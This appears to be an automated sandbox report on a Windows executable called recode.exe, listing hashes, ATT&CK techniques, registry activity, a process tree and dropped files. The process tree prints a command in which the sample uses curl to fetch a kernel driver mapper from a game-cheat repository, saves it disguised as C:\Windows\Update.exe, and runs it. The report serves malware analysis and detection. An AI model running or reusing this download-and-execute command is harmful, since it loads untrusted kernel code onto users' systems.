7cd158131b672caa78fc1e4446e0b328f8fbe9a7900a71cca55e778a1596801a

Analysis

max time kernel
118s
max time network
124s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
11-05-2024 19:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

recode.exe
Size

1.4MB
MD5

bdd59ba7267f819a41854a3f16d24259
SHA1

4f31c541d2d37b0f7124c47bf2345a2dfd772bc4
SHA256

7cd158131b672caa78fc1e4446e0b328f8fbe9a7900a71cca55e778a1596801a
SHA512

2f18823e6e049cfb77dcf8631f938937af339c9faa836131d91aa32fe70c065ee2ae5bebb168dde295753dc39fb42a3b23d29c2994bed8ac5336e0cc7d4972b0
SSDEEP

24576:Fxg7i+ZkpNStkZ2ptmSyzNcMhuoe95bKnMuGKFGR5BXyX1sU:dpNStNkSyJTuoC5mnYFU

Score

1^/10

Malware Config

Signatures

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2184	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\LowRegistry\Shell Extensions\Cached	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\LowRegistry	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\LowRegistry\Shell Extensions	PaintStudio.View.exe

Modifies registry class 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	PaintStudio.View.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "51200"	PaintStudio.View.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	PaintStudio.View.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	PaintStudio.View.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	PaintStudio.View.exe
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	PaintStudio.View.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	PaintStudio.View.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3104	vlc.exe
2976	PaintStudio.View.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3432	mspaint.exe
3432	mspaint.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3104	vlc.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2976	PaintStudio.View.exe
Token: SeDebugPrivilege	2976	PaintStudio.View.exe
Token: SeDebugPrivilege	2976	PaintStudio.View.exe
Token: SeDebugPrivilege	2204	firefox.exe
Token: SeDebugPrivilege	2204	firefox.exe

Suspicious use of FindShellTrayWindow 12 IoCs

pid	Process
3104	vlc.exe
3104	vlc.exe
3104	vlc.exe
3104	vlc.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe

Suspicious use of SendNotifyMessage 10 IoCs

pid	Process
3104	vlc.exe
3104	vlc.exe
3104	vlc.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe
2204	firefox.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3104	vlc.exe
3432	mspaint.exe
2976	PaintStudio.View.exe
2976	PaintStudio.View.exe
2204	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2284 wrote to memory of 228	2284	recode.exe	75
PID 2284 wrote to memory of 228	2284	recode.exe	75
PID 2284 wrote to memory of 204	2284	recode.exe	76
PID 2284 wrote to memory of 204	2284	recode.exe	76
PID 204 wrote to memory of 4232	204	cmd.exe	77
PID 204 wrote to memory of 4232	204	cmd.exe	77
PID 204 wrote to memory of 2052	204	cmd.exe	78
PID 204 wrote to memory of 2052	204	cmd.exe	78
PID 204 wrote to memory of 628	204	cmd.exe	79
PID 204 wrote to memory of 628	204	cmd.exe	79
PID 2284 wrote to memory of 5076	2284	recode.exe	84
PID 2284 wrote to memory of 5076	2284	recode.exe	84
PID 1872 wrote to memory of 2184	1872	cmd.exe	88
PID 1872 wrote to memory of 2184	1872	cmd.exe	88
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 236 wrote to memory of 2204	236	firefox.exe	97
PID 2204 wrote to memory of 5028	2204	firefox.exe	98
PID 2204 wrote to memory of 5028	2204	firefox.exe	98
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99
PID 2204 wrote to memory of 2692	2204	firefox.exe	99

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\recode.exe
"C:\Users\Admin\AppData\Local\Temp\recode.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/Vexigg/Fortnite-External-Source-WIth-Prediction/main/External%20With%20Prediction/build/kdmapper_release.exe --output C:\\Windows\\Update.exe >nul 2>&1 && C:\\Windows\\Update.exe
  2⤵
  PID:228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\recode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:204
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\recode.exe" MD5
    3⤵
    PID:4232
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:2052
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ConfirmPublish.bat" "
1⤵
PID:3844

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\ResetEdit.mp2v"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3104

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1872
- C:\Windows\system32\ipconfig.exe
  ipconfig
  2⤵
  - Gathers network information
  PID:2184

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\StartStep.jpg" /ForceBootstrapPaint3D
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3432

C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
"C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe" -ServerName:Microsoft.MSPaint.AppX437q68k2qc2asvaagas2prv9tjej6ja9.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2976

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:236
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2204.0.630101592\163186700" -parentBuildID 20221007134813 -prefsHandle 1692 -prefMapHandle 1684 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba1aae9b-1161-4612-8472-22b5ba0376f6} 2204 "\\.\pipe\gecko-crash-server-pipe.2204" 1780 230f7fd8158 gpu
    3⤵
    PID:5028
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2204.1.364958697\298094741" -parentBuildID 20221007134813 -prefsHandle 2124 -prefMapHandle 2120 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11604a9d-79f8-44af-aeb1-299ddc6922de} 2204 "\\.\pipe\gecko-crash-server-pipe.2204" 2136 230ecc70758 socket
    3⤵
    - Checks processor information in registry
    PID:2692
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2204.2.19019797\471390520" -childID 1 -isForBrowser -prefsHandle 2756 -prefMapHandle 2868 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1332 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {43b3bb4f-c032-4710-857a-a947c0aac577} 2204 "\\.\pipe\gecko-crash-server-pipe.2204" 2940 230f7f5f458 tab
    3⤵
    PID:2872
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2204.3.1978909313\948299583" -childID 2 -isForBrowser -prefsHandle 3480 -prefMapHandle 3476 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1332 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b6e6f00-cc3d-4bf5-9844-33baaa489f06} 2204 "\\.\pipe\gecko-crash-server-pipe.2204" 3492 230ecc62858 tab
    3⤵
    PID:1168
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2204.4.336344738\1431150857" -childID 3 -isForBrowser -prefsHandle 4188 -prefMapHandle 4184 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1332 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e4e6ba7-cec8-4295-b1d8-6fa149130ed2} 2204 "\\.\pipe\gecko-crash-server-pipe.2204" 4200 230fdcf7258 tab
    3⤵
    PID:2416
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2204.5.2067984355\720830941" -childID 4 -isForBrowser -prefsHandle 4900 -prefMapHandle 4896 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1332 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bd69fb5-a3e5-47b7-a388-dc787efbf69a} 2204 "\\.\pipe\gecko-crash-server-pipe.2204" 4912 230febd2058 tab
    3⤵
    PID:5312
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2204.6.1724729355\1673197798" -childID 5 -isForBrowser -prefsHandle 5056 -prefMapHandle 5060 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1332 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ef18c13-15db-4282-879a-a88c740ae6c7} 2204 "\\.\pipe\gecko-crash-server-pipe.2204" 5044 230febd2658 tab
    3⤵
    PID:5328
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2204.7.634358181\1794515200" -childID 6 -isForBrowser -prefsHandle 5260 -prefMapHandle 5228 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1332 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab06070c-04a6-469e-88c1-6266e407dcbc} 2204 "\\.\pipe\gecko-crash-server-pipe.2204" 5340 230fee3f358 tab
    3⤵
    PID:5340
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2204.8.1367676821\235219934" -childID 7 -isForBrowser -prefsHandle 5364 -prefMapHandle 5512 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1332 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7be62e8d-e867-4c7d-892c-7b127981b42e} 2204 "\\.\pipe\gecko-crash-server-pipe.2204" 5260 230f9480f58 tab
    3⤵
    PID:5476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\41eh5pdr.default-release\cache2\doomed\3984

Filesize
9KB

MD5
2f3ebf588c63f398ca9d789e82ab0b93

SHA1
d95d91679b132cc4c67cfd702cd9553e5a161b0e

SHA256
d48eac455979040982b5a1d2e8d9644fa6e023ba3bc7fe75b69a15a73af1f572

SHA512
9299021fb2f1482035b5f736507f8f448428e1b514cb3ef97d6be0f1459e8180b75d55b1b6720d0481baed694edc9eef779b06e85b8122ce982ce751ff2f06aa

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\41eh5pdr.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
7KB

MD5
c460716b62456449360b23cf5663f275

SHA1
06573a83d88286153066bae7062cc9300e567d92

SHA256
0ec0f16f92d876a9c1140d4c11e2b346a9292984d9a854360e54e99fdcd99cc0

SHA512
476bc3a333aace4c75d9a971ef202d5889561e10d237792ca89f8d379280262ce98cf3d4728460696f8d7ff429a508237764bf4a9ccb59fd615aee07bdcadf30

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json.~tmp

Filesize
232B

MD5
85fa09e9c7af0ef1603704a1c13549fa

SHA1
21a74f66559eb83055842089417d016b3862dfd1

SHA256
28cbc9a48082a3112b433cd1a06c293fbf0b4cef998ba70eb7d8afd196e0456d

SHA512
515a7f742a677beda9d43d7bd2ca47cb65fdd223a0480916c7d1be62761203d49da7bce5f3f319dfe063309732a59e566ab66ecd0e3d2b7daf99056a2ba839dc

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\cloudCommunitySettings.json

Filesize
2KB

MD5
404a3ec24e3ebf45be65e77f75990825

SHA1
1e05647cf0a74cedfdeabfa3e8ee33b919780a61

SHA256
cc45905af3aaa62601a69c748a06a2fa48eca3b28d44d8ec18764a7e8e4c3da2

SHA512
a55382b72267375821b0a229d3529ed54cef0f295f550d1e95661bafccec606aa1cd72e059d37d78e7d2927ae72e2919941251d233152f5eeb32ffdfc96023e5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
aea2bf0d0319d5b368c9656fefc1a679

SHA1
74dfd239c2dd3d78c8f743f2550be7b925a62b53

SHA256
9419489a27c32c489c4627a31138c40f2b7b072169de5f097278327ba9e66ad9

SHA512
c1b19c68d99eeff3574f8557179d3df475f5d482faad83aa91bb95c7a28ffefc33b6698b1fe3c90acf5d99b69481a63ac701dd5f61d044206c923a0fdab3a79e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\datareporting\glean\pending_pings\71aa96e9-9575-4e26-9b9d-f355e04e3836

Filesize
11KB

MD5
cba9bbf345dfe9a75c6599013219b154

SHA1
d7ed7a1685acdfd89c8e089c0cf59e062c9d15db

SHA256
fb4a75765c2ee1d36e9787ee0eb11a8f0543af5900ce4d12d385a8984796df88

SHA512
ed1e6d73ff04a27653065d5fc7b348fbbc9e73bd7e171a71f86d63f0e8c7e9fe803f34271d665747522086d74f01f47cd8d89f6183a2d92a6c680a68c66b6cab

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\datareporting\glean\pending_pings\ec7e86bd-5440-4bf9-959b-4352398d3431

Filesize
746B

MD5
0ef80e3a023925e5c2c5644b0086f595

SHA1
3dffe29dd99603ae5895194b469f3e1e7e4fd8a3

SHA256
eb34bd1515ecf1c8b5d4dff2771b3b2ebb4f91362893443e13b4c9adecb63824

SHA512
93d46bc759ac788cb447842d12ea88f1b938d84c4fe8a9922ef3fdfa2c015f4c11419d587a9adff9a8e6d7caa429b0cdfcdecee532fcb456041f8f31b94b224e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\prefs-1.js

Filesize
6KB

MD5
9e99c0327a22ead5b2f7efb7d6cec1db

SHA1
0266303a065b9509eae48cb1b58f1ec86431c3ba

SHA256
1585f0ff63dddda4d3912203447c229778bebf1623c4611c427b857319acd667

SHA512
e68bb6ed11f45e75ccd7a9d1384b1abf97014d0f1e1dce4456d3b04f9ce4ba85510800b0268239ca9dd649042b4cdda51188014b9f305138f6fa22e5b6e29bd9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\prefs.js

Filesize
6KB

MD5
0fff1df915d7675c41740cb882a82e6d

SHA1
83b624b800f69a01c887832347b5a217b4464830

SHA256
727ba36e9090e6abc5f4f7107465f57a3c000878236e5fdb4bd0119b4fa67f36

SHA512
192a0c9758fac3f445f99c2577a1621ad675ee8c8d750a7b6674325e5d2f4b51d1100a2833c1789658b45a8931e73f5707d69d7cd69fa18013735cd092548cf0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\prefs.js

Filesize
6KB

MD5
57cc49583bbcdf10fb856966e4448878

SHA1
234f192f8d412430a370331c7cd805f3707b4b17

SHA256
432c0506f34fdc866b258c18db3d2381e35b2c0e4575653d58e016dd541309fd

SHA512
e1ba6b529f89af342b0f374f3dfaf0ac2a4170510baa753282890948c3a2a36eab4efec540bb821059d5840bae8138c0e718f95b5e1b3d1dd48724d96cd9b708

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
3258aae4e0912f43746ac9a58ff1383a

SHA1
d3d634b2d691b40b6c4675e8a25238f0578a737d

SHA256
3604d41c3d5884b521c81637f696ea3c6239fb6c69d12fc073da4a877e387fbe

SHA512
669de4e71016a35740cf6175f21c1f1eaef9f2286d6c2da0c8c01e3e96defcec18490c6137968c8387a4c700216e16b0c6b0c2aea78e9e290b9a0bccb8e35070

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
790b2d74e5aa2400b4f089c2e7ef2195

SHA1
d8825b2deecf86aadda345acef6ece1fa31dd9d1

SHA256
05a1c502697367f9d44f77cc9ef501707a66cd3491f64b8f19c895929de741c1

SHA512
b6a3991394a8b96e67108781dfb7cc4f8387d1811093c6e578d070cbe73cce06da049b92132a5c6a444c08e7b1307feed9b46dd055a762c895fe319e3487aa54

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
03545a93d9dc7267f351f0f9b463c67f

SHA1
3880b35363abc0f78c9aef8948eb6890672bf3e2

SHA256
25c52ac40793b557fb8cf8df25185350bb0890e29fd38cb797677ed7a617fee0

SHA512
e81f84119fb3b53fdfd68dfc4d4ddd9424bfbb34f69b3bb78d2c92e0a34095b03409622505d78863d3592a9fb377531bd3b7306d9ba57602aafb02cdfc8b44c0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\sessionstore.jsonlz4

Filesize
5KB

MD5
786c053fc333e70b8ad40922af0327d9

SHA1
9bf7702067d216deb735dd7501366e86145b44ec

SHA256
8aa0a8e5acee4944dc908a8a4f31f0ddd7c3b935ba8db3d6bf9a5a4032ae46ef

SHA512
c92729ee6338d2c38d6cd74c08a23dbbaa3c7138be107f31abacd44c55aeaa5abca9dc6d12632b189f9092229f3d39bd3ff7d9480fdf56cdf29b7bbcad5b402c

Download Submit
memory/3104-13-0x00007FF8FD950000-0x00007FF8FD984000-memory.dmp

Filesize
208KB

Download
memory/3104-15-0x00007FF8E85C0000-0x00007FF8E9670000-memory.dmp

Filesize
16.7MB

Download
memory/3104-14-0x00007FF8F8540000-0x00007FF8F87F6000-memory.dmp

Filesize
2.7MB

Download
memory/3104-12-0x00007FF677230000-0x00007FF677328000-memory.dmp

Filesize
992KB

Download